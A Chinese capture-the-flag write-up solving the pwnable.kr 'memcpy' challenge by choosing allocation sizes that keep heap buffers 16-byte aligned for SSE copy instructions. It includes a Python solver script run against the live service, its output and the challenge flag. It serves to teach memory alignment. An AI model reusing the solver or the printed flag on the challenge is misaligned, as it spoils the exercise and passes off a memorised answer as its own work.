老样子连上去看看,发现一个.c和一个readme
先看readme,大概说了教我们连接到哪去找这个.c可执行文件和flag
看一下memcpy.C
// compiled with : gcc -o memcpy memcpy.c -m32 -lm
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <math.h>unsigned long long rdtsc(){asm("rdtsc");
}char* slow_memcpy(char* dest, const char* src, size_t len){int i;for (i=0; i<len; i++) {dest[i] = src[i];}return dest;
}char* fast_memcpy(char* dest, const char* src, size_t len){size_t i;// 64-byte block fast copyif(len >= 64){i = len / 64;len &= (64-1);while(i-- > 0){__asm__ __volatile__ ("movdqa (%0), %%xmm0\n""movdqa 16(%0), %%xmm1\n""movdqa 32(%0), %%xmm2\n""movdqa 48(%0), %%xmm3\n""movntps %%xmm0, (%1)\n""movntps %%xmm1, 16(%1)\n""movntps %%xmm2, 32(%1)\n""movntps %%xmm3, 48(%1)\n"::"r"(src),"r"(dest):"memory");dest += 64;src += 64;}}// byte-to-byte slow copyif(len) slow_memcpy(dest, src, len);return dest;
}int main(void){setvbuf(stdout, 0, _IONBF, 0);setvbuf(stdin, 0, _IOLBF, 0);printf("Hey, I have a boring assignment for CS class.. :(\n");printf("The assignment is simple.\n");printf("-----------------------------------------------------\n");printf("- What is the best implementation of memcpy? -\n");printf("- 1. implement your own slow/fast version of memcpy -\n");printf("- 2. compare them with various size of data -\n");printf("- 3. conclude your experiment and submit report -\n");printf("-----------------------------------------------------\n");printf("This time, just help me out with my experiment and get flag\n");printf("No fancy hacking, I promise :D\n");unsigned long long t1, t2;int e;char* src;char* dest;unsigned int low, high;unsigned int size;// allocate memorychar* cache1 = mmap(0, 0x4000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);char* cache2 = mmap(0, 0x4000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);src = mmap(0, 0x2000, 7, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);size_t sizes[10];int i=0;// setup experiment parametersfor(e=4; e<14; e++){ // 2^13 = 8Klow = pow(2,e-1);high = pow(2,e);printf("specify the memcpy amount between %d ~ %d : ", low, high);scanf("%d", &size);if( size < low || size > high ){printf("don't mess with the experiment.\n");exit(0);}sizes[i++] = size;}sleep(1);printf("ok, lets run the experiment with your configuration\n");sleep(1);// run experimentfor(i=0; i<10; i++){size = sizes[i];printf("experiment %d : memcpy with buffer size %d\n", i+1, size);dest = malloc( size );memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();slow_memcpy(dest, src, size); // byte-to-byte memcpyt2 = rdtsc();printf("ellapsed CPU cycles for slow_memcpy : %llu\n", t2-t1);memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();fast_memcpy(dest, src, size); // block-to-block memcpyt2 = rdtsc();printf("ellapsed CPU cycles for fast_memcpy : %llu\n", t2-t1);printf("\n");}printf("thanks for helping my experiment!\n");printf("flag : ----- erased in this source code -----\n");return 0;
}
分析一下这段代码做了什么
size_t sizes[10];int i=0;// setup experiment parametersfor(e=4; e<14; e++){ // 2^13 = 8Klow = pow(2,e-1);high = pow(2,e);printf("specify the memcpy amount between %d ~ %d : ", low, high);scanf("%d", &size);if( size < low || size > high ){printf("don't mess with the experiment.\n");exit(0);}sizes[i++] = size;}
从上代码中分析得到,需要输入2的n次幂和2的n+1次幂之间
// run experimentfor(i=0; i<10; i++){size = sizes[i];printf("experiment %d : memcpy with buffer size %d\n", i+1, size);dest = malloc( size );
这段代码分析得到,输入size后malloc分配空间,分配的空间大小就是我们输入的size大小。
memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();slow_memcpy(dest, src, size); // byte-to-byte memcpyt2 = rdtsc();printf("ellapsed CPU cycles for slow_memcpy : %llu\n", t2-t1);memcpy(cache1, cache2, 0x4000); // to eliminate cache effectt1 = rdtsc();fast_memcpy(dest, src, size); // block-to-block memcpyt2 = rdtsc();printf("ellapsed CPU cycles for fast_memcpy : %llu\n", t2-t1);printf("\n");
分配空间后,分别用slow_memcpy和fast_memcpy两种方式,对堆块内的数据向另外一个内存地址拷贝,并比较二者时间。那么分析一下slow_memcpy和fast_memcpy:
char* slow_memcpy(char* dest, const char* src, size_t len){int i;for (i=0; i<len; i++) {dest[i] = src[i];}return dest;
}
slow_memcpy是循环赋值
char* fast_memcpy(char* dest, const char* src, size_t len){size_t i;// 64-byte block fast copyif(len >= 64){i = len / 64;len &= (64-1);while(i-- > 0){__asm__ __volatile__ ("movdqa (%0), %%xmm0\n""movdqa 16(%0), %%xmm1\n""movdqa 32(%0), %%xmm2\n""movdqa 48(%0), %%xmm3\n""movntps %%xmm0, (%1)\n""movntps %%xmm1, 16(%1)\n""movntps %%xmm2, 32(%1)\n""movntps %%xmm3, 48(%1)\n"::"r"(src),"r"(dest):"memory");dest += 64;src += 64;}}// byte-to-byte slow copyif(len) slow_memcpy(dest, src, len);return dest;
}
fast_memcpy是用asm汇编指令movdqa进行拷贝
拷贝结束后输出flag
编译运行一下
其实我这里编译完成后乱输入并没有报错,可能gcc编译器帮我做了一些优化
我还连接上readme提示的接口的程序乱输入尝试了一下,进程没执行完,但是没用获得到错误信息
查看了一下系统信息好像也是64位的
我看别人的writeup中写都是会产生如下的错误:
具体原因我还不明,知道的大佬可以在下面指导我一下,感激不尽,而且我看 反汇编在编译中也是和别人一样的,如下:
上面是出错的位置在fast_memcpy中用于内存复制的两个指令movdqa和movntps他们的操作数如果是内存地址的话,那么这个地址必须是16字节对齐的,否则会产生一般保护性异常导致程序退出。
而且在看别人的writeup中提到了这一点:
malloc在分配内存时它实际上还会多分配4字节用于存储堆块信息,所以如果分配a字节实际上分配的是a+4字节。另外32位系统上该函数分配的内存是以8字节对齐的
看到这里突然想到上面瞎输入不报错的原因有可能是我在64位的kali下执行的,但目前没有验证,但是看上面查询的操作系统别人也是64位的,有些矛盾,但可能有特殊设置,目前还不得知,等下次下一个32位的kali再来验证补充(我个人猜测目前可能是针对32位环境有这种错误,64我这里验证是没有的)
既然知道了这两点就知道程序的异常退出是因为分配的内存没有16字节对齐,那么要getflag,只需要每次分配的内存地址能够被16整除就可以了(实际上由于malloc函数分配的内存8字节对齐,只要内存大小除以16的余数大于9就可以了)。
下面是exp
from socket import *
import timedef work():host = 'pwnable.kr'port = 9022sock = socket(AF_INET,SOCK_STREAM)sock.connect((host,port))print sock.recv(100)for i in xrange(4,14):tmp = 2**i-4print sock.recv(1024),tmptime.sleep(1)sock.send(str(tmp)+'\n')while True:r = sock.recv(1024)if r:print rtime.sleep(0.5)else:breakwork()
保存运行
C:\Users\xxx\Desktop>python exp.py
Hey, I have a boring assignment for CS class.. :(
The assignment is simple.
------------------------
-----------------------------
- What is the best implementation of memcpy? -
- 1. implement your own slow/fast version of memcpy -
- 2. compare them with various size of data -
- 3. conclude your experiment and submit report -
-----------------------------------------------------
This time, just help me out with my experiment and get flag
No fancy hacking, I promise :D
specify the memcpy amount between 8 ~ 16 : 12
specify the memcpy amount between 16 ~ 32 : 28
specify the memcpy amount between 32 ~ 64 : 60
specify the memcpy amount between 64 ~ 128 : 124
specify the memcpy amount between 128 ~ 256 : 252
specify the memcpy amount between 256 ~ 512 : 508
specify the memcpy amount between 512 ~ 1024 : 1020
specify the memcpy amount between 1024 ~ 2048 : 2044
specify the memcpy amount between 2048 ~ 4096 : 4092
specify the memcpy amount between 4096 ~ 8192 : 8188
ok, lets run the experiment with your configurationexperiment 1 : memcpy with buffer size 12
ellapsed CPU cycles for slow_memcpy : 2040
ellapsed CPU cycles for fast_memcpy : 254experiment 2 : memcpy with buffer size 28
ellapsed CPU cycles for slow_memcpy : 444
ellapsed CPU cycles for fast_memcpy : 292experiment 3 : memcpy with buffer size 60
ellapsed CPU cycles for slow_memcpy : 592
ellapsed CPU cycles for fast_memcpy : 478experiment 4 : memcpy with buffer size 124
ellapsed CPU cycles for slow_memcpy : 962
ellapsed CPU cycles for fast_memcpy : 558experiment 5 : memcpy with buffer size 252
ellapsed CPU cycles for slow_memcpy : 1818
ellapsed CPU cycles for fast_memcpy : 564experiment 6 : memcpy with buffer size 508
ellapsed CPU cycles for slow_memcpy : 3496
ellapsed CPU cycles for fast_memcpy : 574experiment 7 : memcpy with buffer size 1020
ellapsed CPU cycles for slow_memcpy : 6840
ellapsed CPU cycles for fast_memcpy : 724experiment 8 : memcpy with buffer size 2044
ellapsed CPU cycles for slow_memcpy : 13790
ellapsed CPU cycles for fast_memcpy :
1040experiment 9 : memcpy with buffer size 4092
ellapsed CPU cycles for slow_memcpy : 28216
ellapsed CPU cycles for fast_memcpy : 1874experiment 10 : memcpy with buffer size 8188
ellapsed CPU cycles for slow_memcpy : 61294
ellapsed CPU cycles for fast_memcpy : 2874thanks for helping my experiment!
flag : 1_w4nn4_br34K_th3_m3m0ry_4lignm3nt
获得flag :)